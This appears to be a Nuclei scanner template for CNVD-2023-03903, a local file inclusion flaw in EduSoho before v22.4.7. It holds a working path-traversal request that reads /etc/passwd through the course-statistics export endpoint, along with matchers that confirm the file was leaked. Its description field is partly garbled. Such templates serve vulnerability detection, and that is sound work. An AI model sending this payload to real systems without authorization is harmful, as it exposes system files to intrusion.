id: CNVD-2023-03903 info: name: EduSoho < v22.4.7 - Local File Inclusion author: s4e-io severity: high description: | The edusoho education and training system EduSoho" || (body="Powered By EduSoho" && body="var app") tags: cnvd,cnvd2023,lfi,edushoho http: - raw: - | GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: word part: content_type words: - "text/csv" - type: status status: - 200 # digest: 490a004630440220519e651840157dd0d430613488d05a9fb0ffcbc63470adb56870318817232caf0220601b4c2fb5c9c93574490265cee0c57a5221507738501519d549a21e0f801ed8:922c64590222798bb761d5b6d8e72950